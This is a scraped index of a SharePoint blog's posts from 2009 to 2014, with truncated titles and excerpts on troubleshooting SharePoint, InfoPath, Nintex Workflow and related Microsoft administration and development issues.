iframes ServicesOffice Web ApplicationsInfoPathSteven Van de Craen2014-10-31T09:35:00-07:00This-hos... (More)<img src="" height="1" width="1" alt=""/> a Summary Links Web Part: List does not exist 365TroubleshootingSteven Van de Craen2014-10-23T08:23:12-07:00Issue i... 
(More)<img src="" height="1" width="1" alt=""/> 2013: Bulk Content Approval of list items fails if user has read permissions on the web 365TroubleshootingSteven Van de Craen2014-10-17T09:51:42-07:00Update 6/08/2015 Issue is still present in May 2015 Cumulative Update and July 2015 Cumulative Update. Will contact Microsoft on this. 3/12/2014 Microsoft has confirmed this issue and will roll out a fix in the next Cumulative Update. Issue Last week I was notified of an issue wher... (More)<img src="" height="1" width="1" alt=""/> 2013 Web Applications requests not logged to ULS logs Van de Craen2014-10-16T15:04:23-07:00Issue m... (More)<img src="" height="1" width="1" alt=""/> 10 Technical Preview and Cisco AnyConnect Van de Craen2014-10-03T14:26:01-07:00Today I decided to look into Windows 10 Technical Preview without safety net and run it on my main work machine. No real issues so far, except connecting to our corporate network via Cisco AnyConnect (version 3.1.04059). Failed to initialize connection subsystem This can easily be resolved ... (More)<img src="" height="1" width="1" alt=""/> Server: allow multiple RDP sessions per user Van de Craen2014-10-02T04:56:09-07:00I’ve often worked on SharePoint environments where I accidentally got kicked or kicked others because we were working with the same account on the same server via Remote Desktop. By default each user is restricted to a single session but there’s a group policy to change this. In Windows Server 2008... (More)<img src="" height="1" width="1" alt=""/> web services in Nintex Workflow and different authentication mechanisms Van de Craen2014-09-12T13:40:06-07:00With the rise of claims based authentication in SharePoint we’ve faced new challenges in how to interact with web services hosted on those environments. Claims based authentication allows many different scenario’s with a mixture of Windows, Forms and SAML Authentication. When you’re working with ... 
(More)<img src="" height="1" width="1" alt=""/> and Content Databases Van de Craen2014-08-13T04:05:25-07:00Today I found a gotcha with the Restore-SPSite command when restoring “over” an existing Site Collection. The issue occurs if all Content Databases are at a maximum of their maximum Site Collection count. The error you’ll receive is that there is basically no room for the new Site Collection:... (More)<img src="" height="1" width="1" alt=""/> creating subsites when a built-in field is modified Van de Craen2014-06-30T07:26:43-07:00One of our site collections in a migration to SharePoint 2013 experienced an issue with creating sub sites: Sorry, something went wrong The URL 'SitePages/Home.aspx' is invalid. It may refer to a nonexistent file or folder, or refer to a valid file or folder that is not in the cur... (More)<img src="" height="1" width="1" alt=""/>: How to troubleshoot issues with Save as template Van de Craen2014-05-23T07:32:17-07:00On an upgrade project to SharePoint 2013 we ran into an issue where a specific site couldn’t be saved as a template (with or without content). You get the non-descriptive “Sorry, something went wrong” and “An unexpected error has occurred” messages. Funny enough the logged Correlation Id is totally ... (More)<img src="" height="1" width="1" alt=""/> SharePoint DCOM errors the easy way - revised Van de Craen2014-05-08T09:17:39-07:00Tagline: Fix your SharePoint DCOM issues with a single click ! - revised for Windows Server 2012 and User Account Control-enabled systems Update 8/05/2014: Scripts were revised to work with Windows Server 2008 R2 and Windows Server 2012 with User Account Control enabled. Original post&#... (More)<img src="" height="1" width="1" alt=""/> 2013: CreatePersonalSite fail when user license mapping incorrectly configured Van de Craen2014-05-05T06:49:14-07:00Last week I was troubleshooting a farm with ADFS where MySite creation failed. 
The ULS logs indicated that the user was not licensed to have a MySite. 04/29/2014 17:34:10.15 w3wp.exe (WS12-WFE1:0x031C) 0x1790 SharePoint Portal Server Personal Site Instantiation af1lc High Skipping cr...

2013: Workflows failing on start (Steven Van de Craen, 2014-04-29)
Recently I helped out a colleague with an issue in a load-balanced SharePoint 2013 environment with Nintex Workflow 2013 on it. All workflows started on WFE1 worked fine, but all workflows started on WFE2 failed on start with the following issue logged to the SharePoint ULS logs: Load Wo...

Saturday Belgium 2014 - Content Enrichment in SharePoint Search (Steven Van de Craen, 2014-04-28)
Last Saturday I delivered a session on "Content Enrichment in SharePoint Search" at the Belgian SharePoint Saturday 2014, showing how to configure it, its potential and some development tips and tricks. Although it was a very specific and narrow topic, there was a big audience for it. We even had to ...

2013 search open in client (Steven Van de Craen, 2014-03-26)
Issue: SharePoint 2013 search results use Excel Calculation Services to open workbooks found in the search results, despite having "open in client" specified at the Document Library and/or Site Collection level. Notice the URL pointing to _layouts/xlviewer.aspx at the bottom of t...

and PowerShell remoting (Steven Van de Craen, 2014-02-28)
In my current project I'm dabbling with PowerShell to query different servers and information from different SharePoint 2010 farms in the organization. This blog contains a brief overview of the steps I took to get a working configuration. Enable remoting and credential pass-through: You n...

REST API not refreshing data (Steven Van de Craen, 2014-02-19)
We're using the Excel REST API in SharePoint 2010 to visualize some graphs directly on a web page. The information is stored in an Excel workbook in a document library, and that workbook had connections to backend data stores. The connection settings inside the workbook were configured with credentials ins...

Workflow and emailing to groups (Steven Van de Craen, 2014-02-19)
Nintex Workflow is able to send emails via the Send notification action. A question often asked is whether it can send emails to SharePoint groups or Active Directory groups. The answer is: yes it can! There are some things you need to know though... Send to an Active Directory group: You can use AD s...

and NAT (Steven Van de Craen, 2014-01-15)
Networking "challenges": I like Hyper-V. I really like it. But I'm not blind to its shortcomings either. The biggest frustration for me has always been the lack of NAT. Up until now I was using ICS (Internet Connection Sharing), but this was far from perfect: it used the same IP address range as t...

Foundation 2013 broken search experience (Steven Van de Craen, 2013-12-10)
Issue: I recently examined a SharePoint Foundation 2013 environment where all Search Boxes had gone missing overnight. Also, when browsing to the Search Center I received an error. The ULS logs showed the following error: System.InvalidProgramException: Common Language Runtime d...

GroupBy ordering with calculated field (Steven Van de Craen, 2013-12-06)
Something that almost every client asks me is how to change the display order of the GroupBy field in a SharePoint List. For instance, let's say you have a grouping on a status field. Unfortunately the List Settings only allow you to sort the groups alphabetically, either ascending or descending. ...

a broken People Picker in Office 2010 (Steven Van de Craen, 2013-11-27)
Recently I was on a troubleshooting mission in a SharePoint 2010 / Office 2010 environment where the People Picker in the Document Information Panel of Word wasn't resolving input, nor did the address book pop up after clicking it. I fired up Fiddler to see a HTTP 500 System.ServiceModel.ServiceAct...

SharePoint Lookup Fields (Steven Van de Craen, 2013-11-20)
Recently I was in an upgrade project and, as in any good upgrade project, there were some kinks that needed ironing out. The issue was a corrupted list that had to be recreated and repopulated. Now there's a challenge in that itself, but it's not the subject of this post. Let's just say that we recreate...

system Content Types (Steven Van de Craen, 2013-11-07)
I was at a client recently that couldn't access ANY of their document libraries anymore. New libraries were also affected by this. The SharePoint ULS logs kept spawning the following error: 10/18/2013 14:11:10.08 w3wp.exe (0x128C) 0x1878 SharePoint Foundation Runtime tkau Unexpected...

the Search Service Application for a specific site (programmatically) (Steven Van de Craen, 2013-10-30)
IApplica...

Forms Services and the xsi:nil in code behind (Steven Van de Craen, 2013-10-25)
Yesterday I had the requirement to programmatically add and remove the xsi:nil attribute from an InfoPath 2010 browser form hosted in InfoPath Forms Services in SharePoint 2010. There are several solutions for adding and removing xsi:nil to be found on the internet, but I've found only one ...
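The "and PowerShell remoting" entry above mentions enabling remoting and credential pass-through as the first steps. A minimal sketch of that kind of configuration, assuming CredSSP is the chosen delegation mechanism (server names and the domain below are hypothetical, not from the post):

```powershell
# On each SharePoint server: enable PowerShell remoting and allow
# the server to accept delegated (CredSSP) credentials.
Enable-PSRemoting -Force
Enable-WSManCredSSP -Role Server -Force

# On the querying workstation: allow delegating credentials to the
# farm servers (scope the pattern to your own environment).
Enable-WSManCredSSP -Role Client -DelegateComputer "*.contoso.local" -Force

# Query a remote farm; -Authentication CredSsp avoids the classic
# "double hop" failure when the remote session talks to SQL Server.
Invoke-Command -ComputerName "WFE1" -Authentication CredSsp `
    -Credential (Get-Credential) -ScriptBlock {
        Add-PSSnapin Microsoft.SharePoint.PowerShell
        Get-SPFarm | Select-Object Name, BuildVersion
    }
```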
SharePoint Farm Solutions from the Config Database (Steven Van de Craen, 2013-10-18)
Why: I was working on what was supposed to be a quick final-run migration from an old SharePoint 2010 farm to a new SharePoint 2010 farm. There had been a test run and a testing period, so it should have been a breeze. After I shut down the SharePoint servers in the old environment I used SQL backup...

at me (Steven Van de Craen, 2013-10-11)
Hey you, look at me! I'm a blog. A SharePoint blog, would you believe it? Don't I look fancy? A new design: For the last few weeks the incredible Tom Van Bortel has been working on a new design for this blog. A task I wouldn't dare to commit myself to; I have very little design skill. But ...

the MySite Url broke the Activity Feed (Steven Van de Craen, 2013-09-04)
Yesterday I was confronted with the issue of a changed My Site Url. The client had asked to change to. The first step is to recreate the Web Application with the new primary Url and set up IIS (certificates). You could extend but they didn't re...

Auto SignIn (Steven Van de Craen, 2013-05-13)
Claims SS...

Saturday Belgium 2013 - Claims for developers (Steven Van de Craen, 2013-05-04)
Last Saturday I delivered a session on "Claims for developers" at the 3rd Belgian SharePoint Saturday edition, focusing on Claims Based Authentication. It was great to see that there was a lot of interest in this topic, since it's something that allows you to do some very cool things. It was a re...

2013 crashes when opening a document (SharePoint 2013) (Steven Van de Craen, 2013-04-17)
Since Co...
and Claims: Map Network Drive issue (Steven Van de Craen, 2013-02-06)
Scenario: If a SharePoint Web Application is configured with Claims Authentication, you might run into an issue when trying to map SharePoint as a network drive. If you only have Windows Authentication configured on the Zone, you'll either be automatically signed in or get a credential prompt...

Development: Cannot connect to the targeted site (Steven Van de Craen, 2013-02-05)
Do you have your SharePoint 2013 / Visual Studio 2012 development environment up and running? If so, you might encounter the following error when you create a new SharePoint Project and enter the URL to your site: Cannot connect to the targeted site. This error can occur if the specified ...

2013 and anonymous users accessing lists and libraries (Steven Van de Craen, 2013-01-26)
The ...

migration to SharePoint 2013 - Part 2 (Steven Van de Craen, 2013-01-21)
Here's a second post regarding the upgrade of my old SharePoint 2007 blog to a newer SharePoint version. Right now I'm running my blog on our new SharePoint 2013 infrastructure in SharePoint 2010 mode (deferred Site Collection upgrade). CKS:EBE: I deployed the original SharePoint 2007 WSP to t...

SharePoint - Some views not upgraded to XsltListViewWebPart (Steven Van de Craen, 2013-01-08)
Update 24/08/16: Revisited post. Update 16/07/13: Included the tool and source for SharePoint 2013 and expanded functionality so that yo...

migration to SharePoint 2013 - Part 1 (Steven Van de Craen, 2013-01-02)
I...

Information Management Policy: Invalid field name. (Steven Van de Craen, 2012-12-12)
One of our projects makes use of Information Management Policies in SharePoint Server. We were programmatically adding these policies to Content Types, but for some reason this didn't work when we migrated the application to SharePoint 2010. Issue: We receive the following error: System.Argume...

migration issue: List does not exist (Steven Van de Craen, 2012-12-11)
Recently I bumped into this weird issue when migrating from SharePoint 2007 to SharePoint 2010. The site collections were correctly upgraded using the DB ATTACH method. Issue: A first look at the site and libraries showed no issues, but when going to the List Settings of certain libraries and lists, ...

Data integration in Office and SharePoint using BDC or BCS (Steven Van de Craen, 2012-12-07)
Today I discovered a rather unpleasant change during a migration of SharePoint 2007 to SharePoint 2010. The customer is still using Office 2007 but is planning on upgrading next year. Situation: In SharePoint 2007 you had the Business Data Catalog (BDC) to bring external data (think back-end syst...

Hyper-V 3.0 machine to VMWare Workstation (Steven Van de Craen, 2012-12-05)
There is a lot of ink already on the subject of converting Microsoft Virtual Machines to VMWare Virtual Machines, but I'm writing down what worked for me to get it up and running. VMWare vCenter Converter: Download it and install it. If you're not carrying multiple machines then install it on your W...

SharePoint DCOM errors the easy way (Steven Van de Craen, 2012-11-29)
Tagline: Fix your SharePoint DCOM issues with a single click! Update 8/05/2014: Scripts were revised to work with Windows Server 2008 R2 and Windows Server 2012 with User Account Control enabled. Revised post: Fixing SharePoint DCOM errors the easy way - revised. Direct...

Conference 2012 Report - Mental Overload (Steven Van de Craen, 2012-11-14)
Share...

Conference 2012 Report - Viva Las Vegas (Steven Van de Craen, 2012-11-12)
My colleague Dimitri and I got the opportunity to go to this year's SharePoint Conference (#SPC12) in Las Vegas. I have to admit that I had mixed feelings at the beginning; I'm not much of a traveler to begin with, and leaving my wife and kids didn't sound too appealing either. But of course we're t...

Forms Services 2010: glitch with repeating dynamic hyperlinks (Steven Van de Craen, 2012-05-22)
t...

8 (Steven Van de Craen, 2012-03-17)
A t...

Computed Field - updated with XSL (Steven Van de Craen, 2012-03-02)
Yesterday I updated the download and source code for the Advanced Computed Field at the Ventigrate Public Code Repository with an XSL stylesheet. This was needed to fix an issue with the field not rendering values when filtered through a Web Part Connection. The Advanced Computed Field relies on CA...

Saturday Belgium 2012 (Steven Van de Craen, 2012-03-01)
Join SharePoint architects, developers, and other professionals on 28th April for the second Belgian 'SharePoint Saturday' event. SharePoint Saturday is an educational, informative & lively day filled with sessions from respected SharePoint professionals & MVPs, covering a wide variety of Sh...
All Items Ribbon Button (Steven Van de Craen, 2012-02-08)
A SharePoint 2010 Sandboxed Solution that adds a Ribbon Button that recycles all items in a Document Library with a single mouse click. I created this mini-project more as an academic exercise in creating a Ribbon Button than for real business value. It can come in handy for development enviro...

2010: Taxonomy issue and Event Receivers (Steven Van de Craen, 2012-02-02)
Issue c...

2010 SOAP Service Error (The top XML element 'string'...) (Steven Van de Craen, 2012-01-26)
Today we were experimenting with the SharePoint 2010 CSOM (Client Side Object Model) and noticed that strange errors such as HTTP ERROR 417 were returned. When browsing to Lists.asmx and Sites.asmx we got the following error: The top XML element 'string' from namespace '....

Server 2010 and PDF Indexing (Steven Van de Craen, 2012-01-05)
Posting this for personal reference: SharePoint 2010 - Configuring Adobe PDF iFilter 9 for 64-bit platforms. Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office Server\14.0\Search\Setup\ContentIndexCommon\Filters\Extension\.pdf] @=hex(7):7b,00,45,00...

2007: Anonymous Version History (Steven Van de Craen, 2012-01-02)
You can configure the permission level of anonymous users to allow viewing versions of documents and items, but no matter what you do, they get prompted for credentials. The Version History page has the property "AllowAnonymousAccess" set to false. It is a virtual property in the Microsoft.Shar...

2010 User Profile Page: Add as colleague - Link Fixup (Steven Van de Craen, 2011-12-27)
Here's a small fix for which I didn't have time to investigate more properly. Issue: The User Profile Page of another user shows a link "Add as colleague" when that user isn't already a colleague. It seems however that the link behind "Add as colleague" directs to the Default AAM URL rather...

The sandbox is too busy to handle the request (Steven Van de Craen, 2011-12-07)
SharePoint 2010 and SharePoint Online (Office 365) allow for custom development in the form of Sandbox Solutions. Your code is restricted to a subset of the SharePoint API but allows you to do most regular operations inside a Site Collection. Problem: Here's a scenario that fails every time and everywh...

- Default Library Content Type is Folder (Steven Van de Craen, 2011-10-19)
Ever Ty...

APIs in SharePoint 2010 Service Pack 1 (SP1) (Steven Van de Craen, 2011-10-17)
New APIs in SharePoint 2010 Service Pack 1 (SP1). Funny enough, a colleague pointed out to me that he couldn't find the UserProfile.ModifyProfilePicture method. Neither could I (running Service Pack 1 + June 11 CU). Can you? Perhaps it was removed in the June 2011 Cumulative Update? UPDATE (18 ...

Administration Time Zone incorrect (Steven Van de Craen, 2011-10-13)
If you happen to change the Windows Time Zone settings AFTER Central Administration has been provisioned, you will see that the time zone/date format is not updated in the administration pages. Luckily, the fix is quite easy: you can just update the Regional Settings of the Central Administra...
October 2011 (Steven Van de Craen, 2011-10-02)
): Stop thinking about feature...

User Management (Steven Van de Craen, 2011-09-30)
This project is further maintained at the Ventigrate Codeplex Repository (). Please go there to get the latest news or for any questions regarding this topic. Page was cross-posted to this blog on 09/30/2011. External User Management: The External User Manage...

and InfoPath Promoted Fields (Steven Van de Craen, 2011-08-25)
A...

Up - Programmatically approving a workflow (Steven Van de Craen, 2011-06-28)
In my previous post "SharePoint 2010: Programmatically Approving/Rejecting Workflow" I mentioned the possibility of an issue when programmatically altering a workflow task. I have been testing it on several SharePoint 2010 farms with different parameters (different patch levels, etc.). UPDATED Ju...

2010: Programmatically Approving/Rejecting Workflow (Steven Van de Craen, 2011-06-23)
Interacting with a workflow in SharePoint is relatively straightforward if you understand the underlying process. I've done multiple projects in both SharePoint 2007 and SharePoint 2010 with some level of workflow interaction: starting a workflow, approving or rejecting a workflow task, or r...

2010: Announcing the Advanced Computed Field for SharePoint 2010 (Steven Van de Craen, 2011-05-26)
Finally available: the SharePoint 2010 version of the Advanced Computed Field. Don't know what it is? Check this out: (the Advanced Computed Field rendering a highlighted/italic item title)

issues with DispForm, EditForm and NewForm (Steven Van de Craen, 2011-03-11)
Each SharePoint List can be given a custom DispForm.aspx, EditForm.aspx and NewForm.aspx to display, edit or create list items and metadata. This post is about restoring them to a working state. Botched Forms: So one of these forms has been edited into a broken state or deleted altogether. If this is ...

Forms Server 2010 Parameterized Submit issue (Steven Van de Craen, 2011-03-09)
I'm currently testing our InfoPath Web Forms for an upcoming migration to InfoPath 2010 and SharePoint 2010 and have come across a reproducible issue. Issue: InfoPath Web Forms cannot use values from other Data Sources as parameters in a Submit Data Connection. When the form is submitted a warning ...

URL Changes and InfoPath Forms (Steven Van de Craen, 2011-03-08)
InfoPath Form Template URL ou...

: SPWeb.Properties versus SPWeb.AllProperties (Steven Van de Craen, 2011-03-05)
Property Bag: SPWeb exposes two ways of interacting with the property bag: SPWeb.Properties exposes a Microsoft.SharePoint.Utilities.SPPropertyBag, and SPWeb.AllProperties exposes a System.Collections.Hashtable. The former is considered legacy; it also stores the key value as lowercase, whi...

2010: Content Type Syndication experiments (Steven Van de Craen, 2011-03-05)
In my post yesterday I raised the question about Content Type syndication using the Content Type Hub mechanism, and how this would work together with Lookup Fields, since they don't support crossing Site Collection boundaries. Another question is in regard to the "challenges" of using OOXML (docx, ...

Lookup Field Types: migration from 2007 to 2010 (Steven Van de Craen, 2011-03-04)
Custom Field Types are a rather advanced topic, but very powerful as well. They allow for real integration of custom components inside standard List and Library rendering. (See my other posts on Custom Field Types.) There are some things you can run into, especially if you have custom Lookup Field T...

multiple credential prompts for Office in combination with SharePoint (Steven Van de Craen, 2011-02-22)
I had seen and tried most of this already, but didn't know the Network Location bit: Multiple Authentication (login) Prompts - Office Products with SharePoint

Policy For Web Application: Account operates as System (Steven Van de Craen, 2011-02-12)
Both...

2010: Increase debugging time by configuring Health Monitoring (Steven Van de Craen, 2011-02-06)
If incr...

Content Productivity Hub 2010 - updated (Steven Van de Craen, 2011-01-18)
Recently updated: the Productivity Hub. The Productivity Hub is a Microsoft SharePoint Server 2010 site collection that offers training materials for end users. The Hub is a SharePoint Server site collection that serves as a learning community and is fully customizable. It provides a centr...

2007 and the mysterious ever required field (Steven Van de Craen, 2011-01-06)
Today is trouble-solving day at a customer. One of the issues was a SharePoint Library on their Intranet having a required field, even though "Require that this column contains information" was set to "No". So I opened up SharePoint Manager 2007 to inspect the SchemaXml: <Field Name="...
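The "SPWeb.Properties versus SPWeb.AllProperties" entry above contrasts the legacy SPPropertyBag (which lowercases its keys) with the Hashtable-backed AllProperties. A minimal sketch of the difference, assuming a site at a hypothetical URL (this needs the SharePoint server assemblies to compile):

```csharp
using System;
using Microsoft.SharePoint;

class PropertyBagDemo
{
    static void Main()
    {
        using (SPSite site = new SPSite("http://intranet"))
        using (SPWeb web = site.OpenWeb())
        {
            // Legacy bag: SPPropertyBag stores its keys in lowercase.
            web.Properties["MyKey"] = "legacy value";
            web.Properties.Update();          // persisted under "mykey"

            // Newer bag: a plain Hashtable that preserves key casing.
            web.AllProperties["MyKey"] = "new value";
            web.Update();                     // persists AllProperties

            // Mixing the two bags can therefore surface the "same"
            // entry under different casings.
            Console.WriteLine(web.AllProperties["MyKey"]);
        }
    }
}
```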
2008 R2 unable to connect to locally shared folder (Steven Van de Craen, 2011-01-05)
...

Office Web Applications for an Upgrade (a day of agony) (Steven Van de Craen, 2011-01-04)
Yesterday...

Live Writer Twitter Plug-in with OAuth (Steven Van de Craen, 2010-11-25)
Since the introduction of OAuth in Twitter, the Twitter Plug-in for Windows Live Writer to tweet new blog posts stopped working. A while back an update was released that works with the new authentication scheme. (This post is really for testing if it works correctly :))

Library Thumbnail Size (Steven Van de Craen, 2010-11-23)
Today I was looking into a way to increase the thumbnail size of slides in a Slide Library (MOSS 2007, SharePoint Server 2010). The SPPictureLibrary has a ThumbnailSize property which you can set, but this is not available for a slide library. So I tried reflection on an SPList to update the relat...

: Slide Library and Folders (Steven Van de Craen, 2010-10-11)
The Slide Library is available in MOSS 2007 and SharePoint Server 2010 and allows you to upload slides from a PowerPoint presentation as separate slides. It is then really easy to compose a new presentation based on slides you select from the library. Working with folders in Slide Libraries is ...

to Windows Token Service (Steven Van de Craen, 2010-10-07)
In SharePoint 2010 the Claims to Windows Token Service (c2wts) is a very nice addition that allows for conversion of claims credentials to Windows tokens. The service is required to run as the LocalSystem account. If you have (like me) accidentally switched it to a specific user, there's no way in t...

for my colleagues (Steven Van de Craen, 2010-09-27)
Another colleague of mine has started his blog on. And don't be fooled by the host name, it's for posts on SharePoint 2010 as well!! Find them here and add them to your feed readers :) Tom Van Rousselt, Sebastian Bouckaert...

2010: User cannot be found after using stsadm migrateuser (Steven Van de Craen, 2010-09-07)
I. Aft...

2010 exams behind me (Steven Van de Craen, 2010-09-01)
I decided to have a go at the SharePoint 2010 exams with little or no preparation and see how it would go. The first three went smoothly. I have to admit I struggled somewhat with the PRO Administrator exam today, but cleared it nevertheless. Exam 70-573: TS: Microsoft SharePoint 2010, Appli...

Event Receivers and HttpContext (Steven Van de Craen, 2010-08-24)
A lesser-known trick to make use of the HttpContext in asynchronous Event Receivers in SharePoint 2007 or SharePoint 2010 is to define a constructor on the Event Receiver class that assigns the HttpContext to an internal or private member variable. You can then access it from the method overrides fo...

Web Apps - creating new documents (Steven Van de Craen, 2010-08-16)
The Office Web Apps allow users without Microsoft Office installed to display or work on Word, Excel or PowerPoint files from the browser. It is a separate installation to your SharePoint Farm, controllable by two Site Collection Features. When active it will render Office 2007/2010 file f...
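The constructor trick from the "Event Receivers and HttpContext" entry above can be sketched as follows. The receiver class name is hypothetical, and this needs the SharePoint server assemblies to compile:

```csharp
using System.Web;
using Microsoft.SharePoint;

public class MyItemReceiver : SPItemEventReceiver
{
    // Captured in the constructor, which still runs on the thread
    // that served the originating web request.
    private readonly HttpContext _context;

    public MyItemReceiver()
    {
        _context = HttpContext.Current;
    }

    public override void ItemAdded(SPItemEventProperties properties)
    {
        // By the time an asynchronous event fires, HttpContext.Current
        // is null; the member captured in the constructor is still set.
        if (_context != null)
        {
            string userAgent = _context.Request.UserAgent;
            // ... use request data as needed ...
        }
    }
}
```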
2010 and Remote Blob Storage for better file versioning (Steven Van de Craen, 2010-08-06)
A feature of using Remote Blob Storage with SharePoint 2010 (FILESTREAM provider in SQL Server 2008) is that document versions do not always create a new full copy of the original file, as they would in a non-RBS environment. This is a huge improvement, since 5 versions of a 10 MB file where only ...

2010: June 2010 Cumulative Update (Steven Van de Craen, 2010-07-31)
Spreading the news... The first Cumulative Update (called "June 2010 CU") for SharePoint 2010 was made available a few days ago: SharePoint Foundation 2010: KB 2028568. SharePoint Server 2010: KB 983319, KB 983497, KB 2182938...

upgraded to CKS:EBE 3.0 (Steven Van de Craen, 2010-07-24)
The smart people behind the Community Kit for SharePoint have released version 3.0 of the Enhanced Blog Edition. Check out the improvements it brings. Cheers!

2010 Development: Replaceable Tokens (Steven Van de Craen, 2010-07-24)
Quick reference: $SharePoint.Project.FileName$: the name of the containing project file, such as "NewProj.csproj". $SharePoint.Project.FileNameWithoutExtension$: the name of the containing p...

Page Home Page (Steven Van de Craen, 2010-07-19)
In SharePoint Server 2010 you have the option to create an Enterprise Wiki, but what if you have SharePoint Foundation 2010 or Search Server 2010 and want to create a Wiki site? You'll notice that there's no Wiki Site Template available like in SharePoint 2007, but nowadays you can activate Wik...

availability (Steven Van de Craen, 2010-06-25)
There have been a lot of issues recently with the availability of my blog. This is because we're currently cleaning out the server room of old servers and virtualizing them. In that process some of the IP addresses got mixed around and of course the ISA rules were not updated yet. Apologies for tha...

language of the Spell Check in MOSS 2007 (Steven Van de Craen, 2010-06-04)
Want a quick way to change the language of the Spell Check for publishing pages in MOSS 2007? Place this script in your masterpage to set the language parameter before the call to the SpellCheck Web Service is made... <script type="text/javascript"> L_Language_Text = 100c; &l...

| SPSaturday: wrap up (Steven Van de Craen, 2010-05-12)
Last Saturday (8 May 2010) the first SharePoint Saturday event in Belgium took place. It was a day full of SharePoint 2010, aimed specifically at developers. As promised, here are the slide deck and demo files I used. Slide deck. Demo 1: creating a sandboxed web part. Demo 2: display sandbox res...

2010 Protected View and SharePoint (Steven Van de Craen, 2010-05-10)
If envir...

Saturday coming near you on May 8th! (Steven Van de Craen, 2010-03-30)
BIWUG is organizing the first SharePoint Saturday in Belgium ever. It's held in Hof Ter Elst, Edegem on the 8th of May 2010. Topics include Visual Studio 2010 Tools, LINQ to SharePoint, Client Object Model, Sandbox solutions, Managed Metadata, and WCF and REST in SharePoint. I'll be there presenti...

Search Scopes: Approximate Item Count is incorrect (Steven Van de Craen, 2010-03-18)
The playe...
is back in the air (Steven Van de Craen, 2010-03-17)
It took about a week to resolve the DNS issue, but now this site is back online to provide you with the occasional posting on SharePoint, .NET, Silverlight and the like. Regards, Steven

does SharePoint know the Content Type of an InfoPath form saved to a document library? (Steven Van de Craen, 2010-03-10)
When" att...

pages to meeting workspaces programmatically (Steven Van de Craen, 2010-03-10)
You ...

2007 document templates and Content Types in SharePoint - lessons learned (Steven Van de Craen, 2010-01-29)
A while ago I stumbled upon a serious design limitation regarding Content Types and centralized document templates. What followed was a series of tests, phone calls with Microsoft, finding alternative solutions and a deep dive into Office Open XML. Request from the customer: "We want to use MOSS...

Programmatically change the Toolbar on a List View Web Part (Steven Van de Craen, 2010-01-28)
A refresher c...

+ serialize an InfoPath Form loses the processing instructions (Steven Van de Craen, 2010-01-21)
Using)...

Search indexes some files with fldXXXX_XXXX file names (Steven Van de Craen, 2010-01-20)
Today som...

Word 2007 Content Controls with empty Placeholder Text (Steven Van de Craen, 2009-12-03)
Word 2007 uses Content Controls to display document fields inside the document (e.g. the header). These document fields can be standard fields but also your SharePoint Fields. By default, when the value of a Content Control is empty it will display the Placeholder Text between square brackets as foll...

in SharePoint (Steven Van de Craen, 2009-11-12)
Recently stumbled upon this old article: Microsoft Office Thumbnails in SharePoint. Has anyone actually done anything like this?

and screen manipulation flickering (Steven Van de Craen, 2009-11-09)
We hap...

Formatting using the Advanced Computed Field (Steven Van de Craen, 2009-11-07)
I got a question on how to use the Advanced Computed Field for conditional formatting, and when I finished writing up the response I figured I might as well share it with the community, being you all :) Here's the config I used: <FieldRefs> <FieldRef Name="TestField" />...

Edit Mode doesn't trigger an update (Steven Van de Craen, 2009-10-26)
Funny thing last week when I wrote a "Page Information Web Part" (something that showed something like 'This page was last modified by X on Y') and it didn't update at all when Web Parts were added, modified or deleted. I can see why it wouldn't, but I still think this is a flaw because there's no w...

Rooms and Equipment Reservations: Consistency Check Web Part (Steven Van de Craen, 2009-10-26)
Still flaw...

on list item body using jQuery (Steven Van de Craen, 2009-10-01)
A...

Search for MOSS 2007 (Steven Van de Craen, 2009-09-23)
Wild Ale...
Document Templates in a library: Document Information Panel shows incorrect properties (Steven Van de Craen, 2009-08-20)
Every th...

Types cannot be created declaratively on a child web (Steven Van de Craen, 2009-08-07)
One can easily create a Content Type on a child web through the SharePoint interface. One can easily create a Content Type on a child web through the SharePoint Object Model. One cannot create a Content Type on a child web through a Feature declaratively (you could create it through ...

2007 SP2 fixed activation issue (Steven Van de Craen, 2009-08-04)
The download for SharePoint 2007 SP2 has been updated to no longer change your environment to trial mode. More on this here:

: Someone changes an item that appears in the following view (Steven Van de Craen, 2009-07-27)
Recently I was asked how to receive notifications when specific metadata for an item changed. I recalled this was somehow possible with the out-of-the-box Alerts, configured to send a notification when something in the View changed. "This feature is not available when I create an aler...

on Win7 RC: issues with OWA 2007 (Steven Van de Craen, 2009-07-22)
I would have preferred if Win7 RTM came sooner so that I could avoid migrating from Beta to RC and then from RC to RTM, but there's no point in whining about it :) So I decided to install the 64-bit issue of Windows 7 Release Candidate. I love how smooth those Win7 installs are. Very little inte...
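The "cannot be created declaratively on a child web" entry above notes that the object model does allow it. A minimal sketch of the object-model route, with a hypothetical site URL, subweb path and content type name (needs the SharePoint server assemblies to compile):

```csharp
using Microsoft.SharePoint;

class ChildWebContentType
{
    static void Main()
    {
        using (SPSite site = new SPSite("http://intranet"))
        using (SPWeb childWeb = site.OpenWeb("/subweb"))
        {
            // Declarative provisioning cannot target a child web, but
            // the object model creates a content type there directly.
            SPContentType parent =
                childWeb.AvailableContentTypes[SPBuiltInContentTypeId.Document];
            SPContentType ct =
                new SPContentType(parent, childWeb.ContentTypes, "Project Document");
            childWeb.ContentTypes.Add(ct);
        }
    }
}
```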
(More)<img src="" height="1" width="1" alt=""/> Receiver Definition: Data and Filter TypesEvent ReceiversSharePointSteven Van de Craen2009-06-30T04:05:00-07:00I recently declared an Event Receiver through a SharePoint Feature: Event Registrations Some of the samples online had surprising elements such as <Data /> and <Filter />. I have never seen them used before and didn’t know their purpose. Perhaps they are not to be messed with ? Per... (More)<img src="" height="1" width="1" alt=""/> and Structure Reports troubleshooting Site QuerySteven Van de Craen2009-06-29T14:30:00-07:00If you have MOSS 2007 than you get the Site Manager for advanced management and with it the “Content and Structure Reports” (http://<server>/Reports List). You can easily display the results of a report through the Site Actions menu. You can also add custom reports since the underlying t... (More)<img src="" height="1" width="1" alt=""/> Receivers on Content Types TypesEvent ReceiversSteven Van de Craen2009-05-07T10:06:00-07:00I'm currently doing quite some research on Event Receivers (ERs) on Content Types (CTs) and activating those CTs on a document library in SharePoint 2007 (WSS 3.0 to be exact, but same applies for MOSS 2007 and MSS(X) 2008). The setup is a single document library with the out of the box Document C... (More)<img src="" height="1" width="1" alt=""/> 2007: Update system properties (Created, Created By, Modified, Modified By) Van de Craen2009-04-13T07:09:00-07:00The system metadata can be changed to any value desired using the object model. I did notice a bug that the "Created By” (aka Author) field wouldn’t update unless also the “Modified By” (aka Editor) field was set (either to a new or it’s current value). SPListItem item = ...; item[“Created By... (More)<img src="" height="1" width="1" alt=""/> Renewal 2009 Van de Craen2009-04-01T11:12:00-07:00I’m 